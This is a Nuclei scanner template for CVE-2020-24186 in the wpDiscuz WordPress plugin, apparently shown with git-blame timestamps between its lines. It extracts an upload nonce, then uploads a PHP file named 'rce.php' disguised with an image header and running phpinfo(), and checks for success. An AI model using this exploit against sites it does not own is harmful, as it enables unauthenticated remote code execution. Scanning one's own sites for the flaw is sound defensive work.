2021-02-28 07:23:43 +00:00
id : CVE-2020-24186
info :
2021-03-14 14:17:36 +00:00
name : Unauthenticated File upload wpDiscuz WordPress plugin RCE
2021-02-28 07:23:43 +00:00
author : Ganofins
2021-03-14 14:18:25 +00:00
severity : critical
2021-02-28 07:23:43 +00:00
description : WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’
reference : https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
2021-03-14 14:17:36 +00:00
tags : cve,cve2020,wordpress,wp-plugin,rce
2021-02-28 07:23:43 +00:00
requests :
- raw :
2021-03-14 14:17:36 +00:00
- |
GET /?p=1 HTTP/1.1
Host : {{Hostname}}
Accept : */*
Connection : close
2021-02-28 07:23:43 +00:00
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
2021-03-14 14:17:36 +00:00
Content-Length : 745
2021-02-28 07:23:43 +00:00
Accept : */*
X-Requested-With : XMLHttpRequest
2021-03-14 14:17:36 +00:00
sec-ch-ua-mobile : ? 0
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type : multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
Origin : {{BaseURL}}
Sec-Fetch-Site : same-origin
Sec-Fetch-Mode : cors
Sec-Fetch-Dest : empty
Referer : {{BaseURL}}
2021-02-28 07:23:43 +00:00
Accept-Encoding : gzip, deflate
2021-03-14 14:17:36 +00:00
Accept-Language : en-GB,en-US;q=0.9,en;q=0.8
2021-02-28 07:23:43 +00:00
Connection : close
2021-03-14 14:17:36 +00:00
------WebKitFormBoundary88AhjLimsDMHU1Ak
2021-02-28 07:23:43 +00:00
Content-Disposition : form-data; name="action"
2021-03-14 14:20:00 +00:00
2021-02-28 07:23:43 +00:00
wmuUploadFiles
2021-03-14 14:17:36 +00:00
------WebKitFormBoundary88AhjLimsDMHU1Ak
2021-02-28 07:23:43 +00:00
Content-Disposition : form-data; name="wmu_nonce"
2021-03-14 14:20:00 +00:00
2021-03-14 14:17:36 +00:00
{{wmuSecurity}}
------WebKitFormBoundary88AhjLimsDMHU1Ak
2021-02-28 07:23:43 +00:00
Content-Disposition : form-data; name="wmuAttachmentsData"
2021-03-14 14:20:00 +00:00
2021-02-28 07:23:43 +00:00
undefined
2021-03-14 14:17:36 +00:00
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition : form-data; name="wmu_files[0]"; filename="rce.php"
Content-Type : image/png
{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
2021-02-28 07:23:43 +00:00
<?php phpinfo();?>
2021-03-14 14:17:36 +00:00
------WebKitFormBoundary88AhjLimsDMHU1Ak
2021-02-28 07:23:43 +00:00
Content-Disposition : form-data; name="postId"
2021-03-14 14:20:00 +00:00
2021-03-14 14:17:36 +00:00
1
------WebKitFormBoundary88AhjLimsDMHU1Ak--
2021-02-28 07:23:43 +00:00
2021-03-14 14:17:36 +00:00
extractors :
- type : regex
part : body
internal : true
name : wmuSecurity
group : 1
regex :
- 'wmuSecurity":"([a-z0-9]+)'
2021-02-28 07:23:43 +00:00
2021-03-14 14:17:36 +00:00
- type : regex
part : body
group : 1
regex :
- '"url":"([a-z:\\/0-9-.]+)"'
matchers-condition : and
2021-02-28 07:23:43 +00:00
matchers :
- type : status
status :
- 200
2021-03-14 14:17:36 +00:00
- type : word
words :
- 'success":true'
- 'fullname'
- 'shortname'
- 'url'
condition : and
part : body
